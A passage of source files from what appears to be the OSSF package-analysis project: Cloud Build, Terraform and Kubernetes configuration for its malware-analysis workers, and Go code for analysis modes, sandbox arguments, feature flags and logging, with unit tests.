 6 |   - 'LOAD_TABLE_PREFIX=merge_'
 7 |   - 'DEST_DATASET=packages'
 8 |   - 'DEST_TABLE=analysis'
 9 |   - 'RESULT_BUCKET=gs://ossf-malware-analysis-results'
10 |   - 'SCHEMA_FILE=function/loader/dynamic-analysis-schema.json'
11 |   entrypoint: '/bin/bash'
12 |   args: ['scripts/bq_load.sh']
13 | timeout: 43200s  # 12 hours
14 | options:
15 |   logging: CLOUD_LOGGING_ONLY
16 | 


--------------------------------------------------------------------------------
/infra/cloudbuild/image_build/cloudbuild.yaml:
--------------------------------------------------------------------------------
1 | steps:
2 | - name: 'gcr.io/cloud-builders/docker'
3 |   env:
4 |   - 'RELEASE_TAG=$TAG_NAME'
5 |   entrypoint: make
6 |   args: ['cloudbuild']
7 | timeout: 2400s
8 | 


--------------------------------------------------------------------------------
/infra/terraform/analysis.tf:
--------------------------------------------------------------------------------
 1 | provider "google" {
 2 |   project = var.project
 3 |   region  = var.region
 4 | }
 5 | 
 6 | terraform {
 7 |   backend "gcs" {
 8 |     bucket = "ossf-analysis-tf-state"
 9 |     prefix = "terraform/state"
10 |   }
11 | }
12 | 
13 | module "docker_registry" {
14 |   source = "./docker_registry"
15 | 
16 |   project = var.project
17 | }
18 | 
19 | module "build" {
20 |   source = "./build"
21 | 
22 |   project = var.project
23 |   github_owner = var.github_owner
24 |   github_repo = var.github_repo
25 | }
26 | 
27 | module "metrics" {
28 |   source = "./metrics"
29 | 
30 |   project = var.project
31 | }


--------------------------------------------------------------------------------
/infra/terraform/build/main.tf:
--------------------------------------------------------------------------------
 1 | # Google Cloud Build Triggers
 2 | 
 3 | resource "google_cloudbuild_trigger" "image-build-trigger" {
 4 |   name = "image-build-trigger"
 5 |   project = var.project
 6 | 
 7 |   github {
 8 |     owner = var.github_owner
 9 |     name = var.github_repo
10 |     push {
11 |         tag = "^rel-[0-9]+$"
12 |     }
13 |   }
14 | 
15 |   filename = "build/cloudbuild.yaml"
16 | }
17 | 


--------------------------------------------------------------------------------
/infra/terraform/build/variables.tf:
--------------------------------------------------------------------------------
1 | variable "project" {}
2 | variable "github_owner" {}
3 | variable "github_repo" {}
4 | 


--------------------------------------------------------------------------------
/infra/terraform/docker_registry/main.tf:
--------------------------------------------------------------------------------
 1 | resource "google_artifact_registry_repository" "gcr_docker" {
 2 |   provider = google-beta
 3 | 
 4 |   project = var.project
 5 |   location = "us"
 6 |   repository_id = "gcr.io"
 7 |   description = "gcr.io docker container registry for OSSF Malware Analysis Images"
 8 |   format = "DOCKER"
 9 | }
10 | 
11 | resource "google_artifact_registry_repository" "us_gcr_docker" {
12 |   provider = google-beta
13 | 
14 |   project = var.project
15 |   location = "us"
16 |   repository_id = "us.gcr.io"
17 |   description = "us.gcr.io docker container registry for OSSF Malware Analysis Images"
18 |   format = "DOCKER"
19 | }
20 | 
21 | resource "google_artifact_registry_repository_iam_policy" "policy" {
22 |   provider = google-beta
23 | 
24 |   project = google_artifact_registry_repository.gcr_docker.project
25 |   location = google_artifact_registry_repository.gcr_docker.location
26 |   repository = google_artifact_registry_repository.gcr_docker.name
27 |   policy_data = data.google_iam_policy.public_registry_policy.policy_data
28 | }
29 | 
30 | data "google_iam_policy" "public_registry_policy" {
31 |   binding {
32 |     role = "roles/artifactregistry.reader"
33 | 
34 |     members = [
35 |       "allUsers",
36 |     ]
37 |   }
38 | }


--------------------------------------------------------------------------------
/infra/terraform/docker_registry/variables.tf:
--------------------------------------------------------------------------------
1 | variable "project" {}
2 | 


--------------------------------------------------------------------------------
/infra/terraform/metrics/variables.tf:
--------------------------------------------------------------------------------
1 | variable "project" {}
2 | 


--------------------------------------------------------------------------------
/infra/terraform/terraform.tfvars:
--------------------------------------------------------------------------------
1 | project      = "ossf-malware-analysis"
2 | region       = "us-central1"
3 | github_owner = "ossf"
4 | github_repo  = "package-analysis"


--------------------------------------------------------------------------------
/infra/terraform/variables.tf:
--------------------------------------------------------------------------------
1 | variable "project" {}
2 | variable "region" {}
3 | variable "github_owner" {}
4 | variable "github_repo" {}
5 | 


--------------------------------------------------------------------------------
/infra/worker/scaler.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: autoscaling/v2beta2
 2 | kind: HorizontalPodAutoscaler
 3 | metadata:
 4 |   name: pubsub
 5 | spec:
 6 |   minReplicas: 1
 7 |   maxReplicas: 1500
 8 |   metrics:
 9 |   - external:
10 |       metric:
11 |         name: pubsub.googleapis.com|subscription|num_undelivered_messages
12 |         selector:
13 |           matchLabels:
14 |             resource.labels.subscription_id: workers
15 |       target:
16 |         type: AverageValue
17 |         averageValue: 1
18 |     type: External
19 |   scaleTargetRef:
20 |     apiVersion: apps/v1
21 |     kind: Deployment
22 |     name: workers-deployment
23 | 


--------------------------------------------------------------------------------
/infra/worker/workers-set.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: apps/v1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: workers-deployment
 5 |   labels:
 6 |     app: workers
 7 | spec:
 8 |   replicas: 200
 9 |   selector:
10 |     matchLabels:
11 |       app: workers
12 |   template:
13 |     metadata:
14 |       labels:
15 |         app: workers
16 |     spec:
17 |       containers:
18 |       - name: worker
19 |         image: gcr.io/ossf-malware-analysis/analysis:latest
20 |         imagePullPolicy: Always
21 |         command: ["worker"]
22 |         env:
23 |         - name: OSSMALWARE_WORKER_SUBSCRIPTION
24 |           # See: https://pkg.go.dev/gocloud.dev/pubsub/gcppubsub#URLOpener
25 |           value: gcppubsub://projects/ossf-malware-analysis/subscriptions/workers?nacklazy=1
26 |         - name: OSSF_MALWARE_ANALYSIS_RESULTS
27 |           value: gs://ossf-malware-analysis-results
28 |         - name: OSSF_MALWARE_ANALYSIS_EXECUTION_LOGS
29 |           value: gs://ossf-malware-analysis-execution-logs
30 |         - name: OSSF_MALWARE_ANALYSIS_FILE_WRITE_RESULTS
31 |           value: gs://ossf-malware-analysis-file-write-results
32 |         - name: OSSF_MALWARE_STATIC_ANALYSIS_RESULTS
33 |           value: gs://ossf-malware-static-analysis-results-v1
34 |         - name: OSSF_MALWARE_ANALYZED_PACKAGES
35 |           value: gs://ossf-malware-analysis-analyzed-packages
36 |         - name: LOGGER_ENV
37 |           value: prod
38 |         - name: OSSF_MALWARE_ANALYSIS_PACKAGES
39 |           value: gs://ossf-malware-analysis-packages
40 |         - name: OSSF_MALWARE_NOTIFICATION_TOPIC
41 |           value: gcppubsub://projects/ossf-malware-analysis/topics/analysis-notify
42 |         - name: OSSF_MALWARE_USER_AGENT_EXTRA
43 |           value: "production"
44 |         - name: OSSF_MALWARE_FEATURE_FLAGS
45 |           value: "CodeExecution"
46 |         securityContext:
47 |           privileged: true
48 |         volumeMounts:
49 |           - mountPath: "/var/lib/containers"
50 |             name: image-storage
51 |           - mountPath: "/worker_tmp"
52 |             name: worker-tmp
53 |         resources:
54 |           requests:
55 |             cpu: 750m
56 |             memory: 768Mi
57 |           limits:
58 |             cpu: 1
59 |             memory: 2Gi
60 |       volumes:
61 |       - name: image-storage
62 |         ephemeral:
63 |           volumeClaimTemplate:
64 |             metadata:
65 |               labels:
66 |                 type: image-storage
67 |             spec:
68 |               accessModes:
69 |               - ReadWriteOnce
70 |               storageClassName: premium-rwo
71 |               resources:
72 |                 requests:
73 |                   storage: 20Gi
74 |       - name: worker-tmp
75 |         ephemeral:
76 |           volumeClaimTemplate:
77 |             metadata:
78 |               labels:
79 |                 type: worker-tmp
80 |             spec:
81 |               accessModes:
82 |               - ReadWriteOnce
83 |               storageClassName: premium-rwo
84 |               resources:
85 |                 requests:
86 |                   storage: 5Gi
87 |   strategy:
88 |     type: "RollingUpdate"
89 |     rollingUpdate:
90 |       maxUnavailable: "5%"
91 |       maxSurge: "1%"
92 | 


--------------------------------------------------------------------------------
/internal/analysis/mode.go:
--------------------------------------------------------------------------------
 1 | package analysis
 2 | 
 3 | // Mode (analysis mode) is used to distinguish between whether static or dynamic analysis is being performed.
 4 | type Mode string
 5 | 
 6 | const (
 7 | 	Dynamic Mode = "dynamic"
 8 | 	Static  Mode = "static"
 9 | )
10 | 
11 | func AllModes() []Mode {
12 | 	return []Mode{Dynamic, Static}
13 | }
14 | 
15 | func ModeFromString(s string) (Mode, bool) {
16 | 	switch Mode(s) {
17 | 	case Dynamic:
18 | 		return Dynamic, true
19 | 	case Static:
20 | 		return Static, true
21 | 	default:
22 | 		return "", false
23 | 	}
24 | }
25 | 


--------------------------------------------------------------------------------
/internal/analysis/status.go:
--------------------------------------------------------------------------------
 1 | package analysis
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 
 6 | 	"github.com/ossf/package-analysis/internal/sandbox"
 7 | )
 8 | 
 9 | type Status string
10 | 
11 | const (
12 | 	// StatusCompleted indicates that the analysis run completed successfully.
13 | 	StatusCompleted = Status("completed")
14 | 
15 | 	// StatusErrorTimeout indicates that the analysis was aborted due to a
16 | 	// timeout.
17 | 	StatusErrorTimeout = Status("error_timeout")
18 | 
19 | 	// StatusErrorAnalysis indicates that the package being analyzed failed
20 | 	// while running the specified command.
21 | 	//
22 | 	// The Stdout and Stderr in the Result should be consulted to understand
23 | 	// further why it failed.
24 | 	StatusErrorAnalysis = Status("error_analysis")
25 | 
26 | 	// StatusErrorOther indicates an error during some part of the analysis
27 | 	// excluding errors covered by other statuses.
28 | 	StatusErrorOther = Status("error_other")
29 | )
30 | 
31 | // MarshalJSON implements the json.Marshaler interface.
32 | func (s Status) MarshalJSON() ([]byte, error) {
33 | 	return json.Marshal(string(s))
34 | }
35 | 
36 | func StatusForRunResult(r *sandbox.RunResult) Status {
37 | 	switch r.Status() {
38 | 	case sandbox.RunStatusSuccess:
39 | 		return StatusCompleted
40 | 	case sandbox.RunStatusFailure:
41 | 		return StatusErrorAnalysis
42 | 	case sandbox.RunStatusTimeout:
43 | 		return StatusErrorTimeout
44 | 	default:
45 | 		return StatusErrorOther
46 | 	}
47 | }
48 | 


--------------------------------------------------------------------------------
/internal/dynamicanalysis/sandbox_args.go:
--------------------------------------------------------------------------------
 1 | package dynamicanalysis
 2 | 
 3 | import (
 4 | 	"github.com/ossf/package-analysis/internal/pkgmanager"
 5 | 	"github.com/ossf/package-analysis/pkg/api/analysisrun"
 6 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
 7 | )
 8 | 
 9 | // defaultCommand returns the path (in the default sandbox image)
10 | // of the default dynamic analysis command for the ecosystem
11 | var defaultCommand = map[pkgecosystem.Ecosystem]string{
12 | 	pkgecosystem.CratesIO:  "/usr/local/bin/analyze-rust.py",
13 | 	pkgecosystem.NPM:       "/usr/local/bin/analyze-node.js",
14 | 	pkgecosystem.Packagist: "/usr/local/bin/analyze-php.php",
15 | 	pkgecosystem.PyPI:      "/usr/local/bin/analyze-python.py",
16 | 	pkgecosystem.RubyGems:  "/usr/local/bin/analyze-ruby.rb",
17 | }
18 | 
19 | func DefaultCommand(ecosystem pkgecosystem.Ecosystem) string {
20 | 	cmd := defaultCommand[ecosystem]
21 | 	if cmd == "" {
22 | 		panic("unsupported ecosystem: " + ecosystem)
23 | 	}
24 | 	return cmd
25 | }
26 | 
27 | // MakeAnalysisArgs returns the arguments to pass to the dynamic analysis command in the sandbox
28 | // for the given phase of dynamic analysis on a package. The actual analysis command
29 | // depends on the ecosystem, see pkgmanager.PkgManager.DynamicAnalysisCommand()
30 | func MakeAnalysisArgs(p *pkgmanager.Pkg, phase analysisrun.DynamicPhase) []string {
31 | 	args := make([]string, 0)
32 | 
33 | 	if p.IsLocal() {
34 | 		args = append(args, "--local", p.LocalPath())
35 | 	} else if p.Version() != "" {
36 | 		args = append(args, "--version", p.Version())
37 | 	}
38 | 
39 | 	if phase == "" {
40 | 		args = append(args, "all")
41 | 	} else {
42 | 		args = append(args, string(phase))
43 | 	}
44 | 
45 | 	args = append(args, p.Name())
46 | 
47 | 	return args
48 | }
49 | 


--------------------------------------------------------------------------------
/internal/featureflags/featureflags.go:
--------------------------------------------------------------------------------
 1 | package featureflags
 2 | 
 3 | import (
 4 | 	"errors"
 5 | 	"fmt"
 6 | 	"strings"
 7 | )
 8 | 
 9 | var ErrUndefinedFlag = errors.New("undefined feature flag")
10 | 
11 | var flagRegistry = make(map[string]*FeatureFlag)
12 | 
13 | // FeatureFlag stores the state for a single flag.
14 | //
15 | // Call Enabled() to see if the flag is enabled.
16 | type FeatureFlag struct {
17 | 	isEnabled bool
18 | }
19 | 
20 | // new registers the flag and sets the default enabled state.
21 | func new(name string, defaultEnabled bool) *FeatureFlag {
22 | 	ff := &FeatureFlag{
23 | 		isEnabled: defaultEnabled,
24 | 	}
25 | 	flagRegistry[name] = ff
26 | 	return ff
27 | }
28 | 
29 | // Enabled returns whether or not the feature is enabled.
30 | func (ff *FeatureFlag) Enabled() bool {
31 | 	return ff.isEnabled
32 | }
33 | 
34 | // Update changes the internal state of the flags based on flags passed in.
35 | //
36 | // flags is a comma separated list of flag names. If a flag name is present it
37 | // will be enabled. If a flag name is preceeded with a "-" character it will be
38 | // disabled.
39 | //
40 | // For example: "MyFeature,-ExperimentalFeature" will enable the flag "MyFeature"
41 | // and disable the flag "ExperimentalFeature".
42 | //
43 | // If a flag is undefined an error wrapping ErrUndefinedFlag will be returned.
44 | func Update(flags string) error {
45 | 	if flags == "" {
46 | 		return nil
47 | 	}
48 | 	for _, n := range strings.Split(flags, ",") {
49 | 		isEnabled := true
50 | 		if n[0] == '-' {
51 | 			isEnabled = false
52 | 			n = n[1:]
53 | 		}
54 | 		if ff, ok := flagRegistry[n]; ok {
55 | 			ff.isEnabled = isEnabled
56 | 		} else {
57 | 			return fmt.Errorf("%w %q", ErrUndefinedFlag, n)
58 | 		}
59 | 	}
60 | 	return nil
61 | }
62 | 
63 | // State returns a representation of the flags that are enabled and disabled.
64 | func State() map[string]bool {
65 | 	s := make(map[string]bool)
66 | 	for k, v := range flagRegistry {
67 | 		s[k] = v.Enabled()
68 | 	}
69 | 	return s
70 | }
71 | 


--------------------------------------------------------------------------------
/internal/featureflags/featureflags_test.go:
--------------------------------------------------------------------------------
 1 | package featureflags
 2 | 
 3 | import (
 4 | 	"reflect"
 5 | 	"testing"
 6 | )
 7 | 
 8 | func resetRegistry() {
 9 | 	flagRegistry = make(map[string]*FeatureFlag)
10 | }
11 | 
12 | func TestFlagDefault_True(t *testing.T) {
13 | 	resetRegistry()
14 | 	ff := new("TestFlag", true)
15 | 	if !ff.Enabled() {
16 | 		t.Error("Enabled() = false; want true")
17 | 	}
18 | }
19 | 
20 | func TestFlagDefault_False(t *testing.T) {
21 | 	resetRegistry()
22 | 	ff := new("TestFlag", false)
23 | 	if ff.Enabled() {
24 | 		t.Error("Enabled() = true; want false")
25 | 	}
26 | }
27 | 
28 | func TestFlagUpdate_SingleFlag(t *testing.T) {
29 | 	resetRegistry()
30 | 	ff := new("TestFlag", false)
31 | 	Update("TestFlag")
32 | 
33 | 	if !ff.Enabled() {
34 | 		t.Error("Enabled() = false; want true")
35 | 	}
36 | }
37 | 
38 | func TestFlagUpdate_SingleFlagOff(t *testing.T) {
39 | 	resetRegistry()
40 | 	ff := new("TestFlag", true)
41 | 	Update("-TestFlag")
42 | 
43 | 	if ff.Enabled() {
44 | 		t.Error("Enabled() = true; want false")
45 | 	}
46 | }
47 | 
48 | func TestFlagUpdate_MultiFlags(t *testing.T) {
49 | 	resetRegistry()
50 | 	new("TestFlag1", false)
51 | 	new("TestFlag2", true)
52 | 	new("TestFlag3", false)
53 | 	Update("TestFlag1,-TestFlag2,TestFlag3")
54 | 	want := map[string]bool{
55 | 		"TestFlag1": true,
56 | 		"TestFlag2": false,
57 | 		"TestFlag3": true,
58 | 	}
59 | 	if got := State(); !reflect.DeepEqual(want, got) {
60 | 		t.Errorf("State() = %v; want %v", got, want)
61 | 	}
62 | }
63 | 
64 | func TestFlagUpdate_MultiFlags_EmptyString(t *testing.T) {
65 | 	resetRegistry()
66 | 	new("TestFlag1", false)
67 | 	new("TestFlag2", true)
68 | 	new("TestFlag3", false)
69 | 	Update("")
70 | 	want := map[string]bool{
71 | 		"TestFlag1": false,
72 | 		"TestFlag2": true,
73 | 		"TestFlag3": false,
74 | 	}
75 | 	if got := State(); !reflect.DeepEqual(want, got) {
76 | 		t.Errorf("State() = %v; want %v", got, want)
77 | 	}
78 | }
79 | 
80 | func TestFlagUpdate_Error(t *testing.T) {
81 | 	resetRegistry()
82 | 	err := Update("TestFlag")
83 | 	if err == nil {
84 | 		t.Errorf("Update() = nil; want an error")
85 | 	}
86 | }
87 | 


--------------------------------------------------------------------------------
/internal/featureflags/features.go:
--------------------------------------------------------------------------------
 1 | package featureflags
 2 | 
 3 | var (
 4 | 	// WriteFileContents will store the contents of write observed from strace
 5 | 	// data during dynamic analysis.
 6 | 	WriteFileContents = new("WriteFileContents", true)
 7 | 
 8 | 	// SaveAnalyzedPackages downloads the package archive and saves it
 9 | 	// to the analyzed packages bucket (if configured) after analysis completes
10 | 	SaveAnalyzedPackages = new("SaveAnalyzedPackages", true)
11 | 
12 | 	// PubSubExtender determines whether the worker uses a real GCP extender
13 | 	// for keeping messages alive during long-running processing.
14 | 	PubSubExtender = new("PubSubExtender", true)
15 | 
16 | 	// CodeExecution invokes package code automatically during dynamic analysis,
17 | 	// which may uncover extra malicious behaviour. The names of executed functions,
18 | 	// methods and classes are logged to a file.
19 | 	CodeExecution = new("CodeExecution", true)
20 | 
21 | 	// StraceDebugLogging enables verbose logging of strace parsing during dynamic analysis.
22 | 	// This feature can only be used in the analysis image, and if enabled, the -strace-logs-dir
23 | 	// flag must also be set. When enabled, the log files are then accessible via an explicit
24 | 	// docker mount or copy of the specified directory from the container to the host filesystem.
25 | 	StraceDebugLogging = new("StraceDebugLogging", false)
26 | )
27 | 


--------------------------------------------------------------------------------
/internal/log/context.go:
--------------------------------------------------------------------------------
 1 | package log
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"log/slog"
 6 | )
 7 | 
 8 | type attrSliceContextKey struct{}
 9 | 
10 | func attrSliceFromContext(ctx context.Context) []slog.Attr {
11 | 	if v := ctx.Value(attrSliceContextKey{}); v != nil {
12 | 		return v.([]slog.Attr)
13 | 	}
14 | 	return nil
15 | }
16 | 
17 | // ContextWithAttrs is used to add attrs to the context so they are included
18 | // when logs are output.
19 | func ContextWithAttrs(ctx context.Context, attr ...slog.Attr) context.Context {
20 | 	if len(attr) == 0 {
21 | 		return ctx
22 | 	}
23 | 	attrSlice := append(attrSliceFromContext(ctx), attr...)
24 | 	return context.WithValue(ctx, attrSliceContextKey{}, attrSlice)
25 | }
26 | 
27 | func ClearContextAttrs(ctx context.Context) context.Context {
28 | 	attrSlice := attrSliceFromContext(ctx)
29 | 	if attrSlice == nil {
30 | 		return ctx
31 | 	}
32 | 	return context.WithValue(ctx, attrSliceContextKey{}, nil)
33 | }
34 | 
35 | // LoggerWithContext returns a logger with any attrs in the context passed to
36 | // the logger.
37 | //
38 | // Note: duplicate attributes may be logged if ctx, or a descendent, is used
39 | // later in a call to (Debug|Info|Warn|Error)Context on the returned slog.Logger.
40 | //
41 | // If the same context is needed, call ClearContextAttrs on the context to avoid
42 | // logging the attrs again.
43 | func LoggerWithContext(logger *slog.Logger, ctx context.Context) *slog.Logger {
44 | 	attrSlice := attrSliceFromContext(ctx)
45 | 	if len(attrSlice) == 0 {
46 | 		return logger
47 | 	}
48 | 	return slog.New(logger.Handler().WithAttrs(attrSlice))
49 | }
50 | 
51 | type contextLogHandler struct {
52 | 	handler slog.Handler
53 | }
54 | 
55 | func (h *contextLogHandler) Handle(ctx context.Context, r slog.Record) error {
56 | 	attrSlice := attrSliceFromContext(ctx)
57 | 	if len(attrSlice) > 0 {
58 | 		r.AddAttrs(attrSlice...)
59 | 	}
60 | 	return h.handler.Handle(ctx, r)
61 | }
62 | 
63 | func (h *contextLogHandler) WithAttrs(attrs []slog.Attr) slog.Handler {
64 | 	return &contextLogHandler{
65 | 		handler: h.handler.WithAttrs(attrs),
66 | 	}
67 | }
68 | 
69 | func (h *contextLogHandler) WithGroup(name string) slog.Handler {
70 | 	return &contextLogHandler{
71 | 		handler: h.handler.WithGroup(name),
72 | 	}
73 | }
74 | 
75 | func (h *contextLogHandler) Enabled(ctx context.Context, l slog.Level) bool {
76 | 	return h.handler.Enabled(ctx, l)
77 | }
78 | 
79 | func NewContextLogHandler(handler slog.Handler) slog.Handler {
80 | 	return &contextLogHandler{
81 | 		handler: handler,
82 | 	}
83 | }
84 | 


--------------------------------------------------------------------------------
/internal/log/context_test.go:
--------------------------------------------------------------------------------
  1 | package log_test
  2 | 
  3 | import (
  4 | 	"context"
  5 | 	"testing"
  6 | 
  7 | 	"log/slog"
  8 | 
  9 | 	"github.com/ossf/package-analysis/internal/log"
 10 | )
 11 | 
 12 | func assertRecordAttrs(t *testing.T, r slog.Record, attrs []slog.Attr) {
 13 | 	t.Helper()
 14 | 
 15 | 	wantLen := len(attrs)
 16 | 	gotLen := r.NumAttrs()
 17 | 	if wantLen != gotLen {
 18 | 		t.Errorf("record.NumAttrs() = %v; want %v", gotLen, wantLen)
 19 | 	}
 20 | 
 21 | 	r.Attrs(func(a slog.Attr) bool {
 22 | 		for _, attr := range attrs {
 23 | 			if a.Equal(attr) {
 24 | 				return true
 25 | 			}
 26 | 		}
 27 | 		t.Errorf("unexpected attr %v", a)
 28 | 		return true
 29 | 	})
 30 | }
 31 | 
 32 | func TestContextWithAttrs(t *testing.T) {
 33 | 	attr1 := slog.Any("hello", "world")
 34 | 	attr2 := slog.Int("meaning", 42)
 35 | 	attr3 := slog.String("a", "b")
 36 | 
 37 | 	h := &testHandler{}
 38 | 	logger := slog.New(log.NewContextLogHandler(h))
 39 | 
 40 | 	ctx := context.Background()
 41 | 
 42 | 	// Add attrs to the context and ensure they are used.
 43 | 	ctx = log.ContextWithAttrs(ctx, attr1, attr2)
 44 | 	logger.InfoContext(ctx, "test", "a", "b")
 45 | 	assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3})
 46 | }
 47 | 
 48 | func TestContextWithAttrs_InnerCtx(t *testing.T) {
 49 | 	attr1 := slog.Any("hello", "world")
 50 | 	attr2 := slog.Int("meaning", 42)
 51 | 	attr3 := slog.Any("complex", struct{ a string }{a: "string"})
 52 | 
 53 | 	h := &testHandler{}
 54 | 	logger := slog.New(log.NewContextLogHandler(h))
 55 | 
 56 | 	ctx := context.Background()
 57 | 	ctx = log.ContextWithAttrs(ctx, attr1, attr2)
 58 | 
 59 | 	// Add more attrs to the context and ensure they are used.
 60 | 	innerCtx := log.ContextWithAttrs(ctx, attr3)
 61 | 	logger.InfoContext(innerCtx, "test")
 62 | 	assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3})
 63 | }
 64 | 
 65 | func TestContextWithAttrs_OuterAfterInnerCtx(t *testing.T) {
 66 | 	attr1 := slog.Any("hello", "world")
 67 | 	attr2 := slog.Int("meaning", 42)
 68 | 	attr3 := slog.Any("complex", struct{ a string }{a: "string"})
 69 | 
 70 | 	h := &testHandler{}
 71 | 	logger := slog.New(log.NewContextLogHandler(h))
 72 | 
 73 | 	ctx := context.Background()
 74 | 	ctx = log.ContextWithAttrs(ctx, attr1, attr2)
 75 | 	_ = log.ContextWithAttrs(ctx, attr3)
 76 | 
 77 | 	// Use the earlier context to ensure the innerCtx attrs are not included.
 78 | 	logger.InfoContext(ctx, "test")
 79 | 	assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2})
 80 | }
 81 | 
 82 | func TestContextWithAttrs_NoAttrs(t *testing.T) {
 83 | 	attr1 := slog.String("a", "b")
 84 | 
 85 | 	h := &testHandler{}
 86 | 	logger := slog.New(log.NewContextLogHandler(h))
 87 | 
 88 | 	ctx := context.Background()
 89 | 	ctx = log.ContextWithAttrs(ctx)
 90 | 
 91 | 	logger.InfoContext(ctx, "test", "a", "b")
 92 | 	assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1})
 93 | }
 94 | 
 95 | func TestLoggerWithContext(t *testing.T) {
 96 | 	attr1 := slog.Any("hello", "world")
 97 | 	attr2 := slog.Int("meaning", 42)
 98 | 	attr3 := slog.String("a", "b")
 99 | 
100 | 	h := &testHandler{}
101 | 	logger := slog.New(log.NewContextLogHandler(h))
102 | 
103 | 	ctx := context.Background()
104 | 	ctx = log.ContextWithAttrs(ctx, attr1)
105 | 	logger = log.LoggerWithContext(logger, ctx)
106 | 
107 | 	ctx = log.ContextWithAttrs(log.ClearContextAttrs(ctx), attr2)
108 | 
109 | 	logger.InfoContext(ctx, "test", "a", "b")
110 | 	assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3})
111 | }
112 | 


--------------------------------------------------------------------------------
/internal/log/log.go:
--------------------------------------------------------------------------------
 1 | // Package log wraps Uber's Zap logging library to make it easy to use across
 2 | // the project.
 3 | //
 4 | // Initialize() MUST be called before the first logging statement, if it is not
 5 | // called the command will panic and exit.
 6 | //
 7 | // See the Zap docs for more details: https://pkg.go.dev/go.uber.org/zap
 8 | package log
 9 | 
10 | import (
11 | 	golog "log"
12 | 	"log/slog"
13 | 	"strings"
14 | 
15 | 	"github.com/blendle/zapdriver"
16 | 	"go.uber.org/zap"
17 | 	"go.uber.org/zap/exp/zapslog"
18 | )
19 | 
20 | // LoggingEnv is used to represent a specific configuration used by a given
21 | // environment.
22 | type LoggingEnv string
23 | 
24 | // String implements the Stringer interface.
25 | func (e LoggingEnv) String() string {
26 | 	return string(e)
27 | }
28 | 
29 | const (
30 | 	LoggingEnvDev  LoggingEnv = "dev"
31 | 	LoggingEnvProd LoggingEnv = "prod"
32 | 
33 | 	// StraceDebugLogDir is a hardcoded directory that can be used to store
34 | 	// the strace debug log, if the strace debug logging feature is enabled
35 | 	StraceDebugLogDir = "/straceLogs"
36 | )
37 | 
38 | var (
39 | 	defaultLoggingEnv LoggingEnv = LoggingEnvDev
40 | )
41 | 
42 | func DefaultLoggingEnv() LoggingEnv {
43 | 	return defaultLoggingEnv
44 | }
45 | 
46 | // Initialize the logger for logging.
47 | //
48 | // Passing in "true" will use Zap's default production configuration, while
49 | // "false" will use the default development configuration.
50 | //
51 | // Note: this method MUST be called before any other method in this package.
52 | func Initialize(env string) {
53 | 	// TODO: replace zap entirely with native slog.
54 | 	// Note that zap currently provides some useful features, such as prod and
55 | 	// dev environments, standard logger replacement, and GCP StackDriver
56 | 	// integration. Since log/slog is so new, many of the same capabilities are
57 | 	// yet to receive good support in third-party libraries.
58 | 	var err error
59 | 	var logger *zap.Logger
60 | 	switch strings.ToLower(env) {
61 | 	case LoggingEnvProd.String():
62 | 		defaultLoggingEnv = LoggingEnvProd
63 | 		config := zapdriver.NewProductionConfig()
64 | 		// Make sure sampling is disabled.
65 | 		config.Sampling = nil
66 | 		// Build the logger and ensure we use the zapdriver Core so that labels
67 | 		// are handled correctly.
68 | 		logger, err = config.Build(zapdriver.WrapCore())
69 | 	case LoggingEnvDev.String():
70 | 		fallthrough
71 | 	default:
72 | 		logger, err = zap.NewDevelopment()
73 | 	}
74 | 	if err != nil {
75 | 		golog.Panic(err)
76 | 	}
77 | 	zap.RedirectStdLog(logger)
78 | 	// Ensure slog.Default logs to the same destination as zap.
79 | 	slogger := slog.New(NewContextLogHandler(zapslog.NewHandler(logger.Core(), zapslog.WithCaller(true))))
80 | 	slog.SetDefault(slogger)
81 | }
82 | 
83 | // Label causes attributes written by zapdriver to be marked as labels inside
84 | // StackDriver when LoggingEnv is LoggingEnvProd. Otherwise it wraps slog.String.
85 | func Label(key, value string) slog.Attr {
86 | 	if defaultLoggingEnv == LoggingEnvProd {
87 | 		return slog.String("labels."+key, value)
88 | 	} else {
89 | 		return slog.String(key, value)
90 | 	}
91 | }
92 | 


--------------------------------------------------------------------------------
/internal/log/log_test.go:
--------------------------------------------------------------------------------
 1 | package log_test
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"log/slog"
 6 | )
 7 | 
 8 | type testHandler struct {
 9 | 	slog.Handler
10 | 
11 | 	root    *testHandler
12 | 	records []slog.Record
13 | 	attrs   []slog.Attr
14 | }
15 | 
16 | func (h *testHandler) getRoot() *testHandler {
17 | 	if h.root == nil {
18 | 		return h
19 | 	}
20 | 	return h.root
21 | }
22 | 
23 | func (h *testHandler) LastRecord() slog.Record {
24 | 	root := h.getRoot()
25 | 	l := len(root.records)
26 | 	if l == 0 {
27 | 		return slog.Record{}
28 | 	}
29 | 	return root.records[l-1]
30 | }
31 | 
32 | func (h *testHandler) All() []slog.Record {
33 | 	root := h.getRoot()
34 | 	return root.records
35 | }
36 | 
37 | func (h *testHandler) Len() int {
38 | 	root := h.getRoot()
39 | 	return len(root.records)
40 | }
41 | 
42 | func (h *testHandler) Enabled(_ context.Context, _ slog.Level) bool {
43 | 	return true
44 | }
45 | 
46 | func (h *testHandler) Handle(ctx context.Context, r slog.Record) error {
47 | 	r.AddAttrs(h.attrs...)
48 | 	root := h.getRoot()
49 | 	root.records = append(h.getRoot().records, r)
50 | 	return nil
51 | }
52 | 
53 | func (h *testHandler) WithAttrs(attrs []slog.Attr) slog.Handler {
54 | 	return &testHandler{
55 | 		root:  h.getRoot(),
56 | 		attrs: append(h.attrs, attrs...),
57 | 	}
58 | }
59 | 


--------------------------------------------------------------------------------
/internal/log/writer.go:
--------------------------------------------------------------------------------
 1 | package log
 2 | 
 3 | import (
 4 | 	"bytes"
 5 | 	"context"
 6 | 	"io"
 7 | 	"log/slog"
 8 | 	"unicode"
 9 | )
10 | 
11 | // NewWriter returns an io.WriteCloser that logs each line written as a single
12 | // log entry at the given level with the supplied keysAndValues.
13 | //
14 | // Close() must be called to free up the resources used and flush any unwritten
15 | // log entries to the logger.
